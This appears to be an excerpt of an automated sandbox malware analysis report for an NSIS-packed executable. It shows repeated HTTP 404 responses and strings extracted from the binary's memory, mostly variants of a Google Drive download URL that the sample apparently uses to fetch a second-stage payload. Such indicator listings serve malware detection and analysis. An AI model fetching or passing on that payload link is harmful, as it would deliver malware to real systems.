      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTPSAVtfR4XjmO_v3WA6bPvV6XjRtUcKAea1tg9dsK3ECRk2pI-yjq12m49LcgZdGyNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:36:07 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-khC-4aYosW-NtjAkFBbzkA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTxrKg_PRcbJuMiP9sWAXU45uDqcUXmDcebcjGHi5kR3BhScNA5rP936s04pD8kdGx7Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:36:19 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-dsAg3u2m1n6G9y7LcDmY-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5fZLTZMvvAK6xJxCXVMWo0ALSuyc8p4cXLMX1B9WfDre_7bi_eVaENdNN0gvaULsE5Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:36:30 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce--MbIMg8M0Mr0djtKj4o1Nw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5SHfOai1a0h7QW1V-BQfkOms-9u5QPqmXUzlupK8-GYJHLCAp0Fcaw8L5dmHc999FGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:36:41 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-tpo13ul6SnSk2J4xPFQsHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4rpgtBfhYJB1A2KOau2u4CO-QRuHFjT_6hYVOEdy7y6IWSG3VOcTAoCXXnwOQqIbjdContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:36:53 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-bu_VVRdt6hU3qlDZVPM7fA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Wtk9gHFrryruSlyIDc4g21IdKj_2V246s1RBlhnI9JYQz1PfjSiIMqY8kmnX-JhxEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:37:04 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-z0XLASyq9bl-uqtYbMOkmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT3RiN9ZxCtdSWdsf14TfbGiPZL38YNsLWgeMIBhPPTBA-DwoktkUs6bz4Xg-LUbdT8y5WTUBkContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:37:15 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-drEtOWCVekWEL3C9TKVEBw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5qtrPtrf2Pn6Vn6erPGfFCrkflvGsQd_kdKlUnUPCLe7jrcNdZIus4srMDKxPmQQYPContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:37:26 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-jvvcYuxu1kv3cttYFuUR5g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQG8UH1SaxGn2miBV8IRlCvItB0d_hZKuhnxm_mgyjbcBS_pGVYwi70r53PS1f8OKE9Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:37:37 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-SNSH-tzagvYScy3jlsUV8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: nRNzqQOQwk.exe
      String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
      Source: nRNzqQOQwk.exe
      String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
      Source: nRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      String found in binary or memory: http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.
      Source: nRNzqQOQwk.exe, nRNzqQOQwk.exe, 00000000.00000000.11813384787.0000000000409000.00000008.00000001.01000000.00000003.sdmp, nRNzqQOQwk.exe, 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmp
      String found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: nRNzqQOQwk.exe, 00000000.00000000.11813384787.0000000000409000.00000008.00000001.01000000.00000003.sdmp, nRNzqQOQwk.exe, 00000000.00000002.13417599154.0000000000409000.00000004.00000001.01000000.00000003.sdmp
      String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: nRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000649000.00000020.00000001.01000000.00000006.sdmp
      String found in binary or memory: http://www.gopher.ftp://ftp.
      Source: nRNzqQOQwk.exe, 00000001.00000001.12761978127.0000000000626000.00000020.00000001.01000000.00000006.sdmp
      String found in binary or memory: http://www.ibm.com/data/dtd/v11/ibmxhtml1-transitional.dtd-//W3O//DTD
      Source: nRNzqQOQwk.exe
      String found in binary or memory: http://www.quovadis.bm0
      Source: nRNzqQOQwk.exe, 00000001.00000001.12761978127.00000000005F2000.00000020.00000001.01000000.00000006.sdmp
      String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: nRNzqQOQwk.exe, 00000001.00000001.12761978127.00000000005F2000.00000020.00000001.01000000.00000006.sdmp
      String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://apis.google.com
      Source: nRNzqQOQwk.exe
      String found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=d
      Source: nRNzqQOQwk.exe, 00000001.00000003.12959116605.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16473999157.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13856443366.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/
      Source: nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/(
      Source: nRNzqQOQwk.exe, 00000001.00000003.12965484524.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.12959116605.000000000683B000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/8
      Source: nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/;
      Source: nRNzqQOQwk.exe
      String found in binary or memory: https://drive.google.com/P
      Source: nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/a
      Source: nRNzqQOQwk.exe
      String found in binary or memory: https://drive.google.com/e
      Source: nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/ny
      Source: nRNzqQOQwk.exe
      String found in binary or memory: https://drive.google.com/r
      Source: nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/rcontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=do
      Source: nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl
      Source: nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSlP
      Source: nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSlWtbofOIfVaRbLSl
      Source: nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916833797.0000000006840000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSlWtbofOIfVaRbLSlF6
      Source: nRNzqQOQwk.exe, 00000001.00000003.13408506429.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13856443366.00000000067DE000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSlY
      Source: nRNzqQOQwk.exe, 00000001.00000003.13077401848.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13071150715.000000000683B000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSlcatiA
      Source: nRNzqQOQwk.exe, 00000001.00000003.13750852480.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13632490262.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968737967.00000000067DE000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13856443366.00000000067DE000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSlm
      Source: nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/xH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
      Source: nRNzqQOQwk.exe
      String found in binary or memory: https://drive.google.com/xH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloade
      Source: nRNzqQOQwk.exe, 00000001.00000003.15233985037.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.15233856736.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916833797.0000000006840000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/xH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloadider
      Source: nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000002.16916833797.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474207406.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16473999157.000000000683B000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/xH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloads&
      Source: nRNzqQOQwk.exe, 00000001.00000002.16916833797.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp
      String found in binary or memory: https://drive.google.com/xH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloadt
      Source: nRNzqQOQwk.exe
      String found in binary or memory: https://drive.usercontent.google.com/
      Source: nRNzqQOQwk.exe
      String found in binary or memory: https://drive.usercontent.google.com/J
      Source: nRNzqQOQwk.exe
      String found in binary or memory: https://drive.usercontent.google.com/U
      Source: nRNzqQOQwk.exe
      String found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaR
      Source: nRNzqQOQwk.exe, 00000001.00000003.14195151062.00000000067FB000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13296845871.0000000006828000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
      Source: nRNzqQOQwk.exe, 00000001.00000003.15580218463.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474207406.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16473999157.000000000683B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download0L
      Source: nRNzqQOQwk.exe, 00000001.00000003.15915220747.00000000067FB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloadK
      Source: nRNzqQOQwk.exe, 00000001.00000002.16916833797.0000000006840000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16474207406.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.16473999157.000000000683B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloadP
      Source: nRNzqQOQwk.exe, 00000001.00000003.14531658810.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968616030.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419238478.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14419436535.000000000683F000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.13968482023.000000000683B000.00000004.00000020.00020000.00000000.sdmp, nRNzqQOQwk.exe, 00000001.00000003.14531787161.000000000683F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=downloadZL
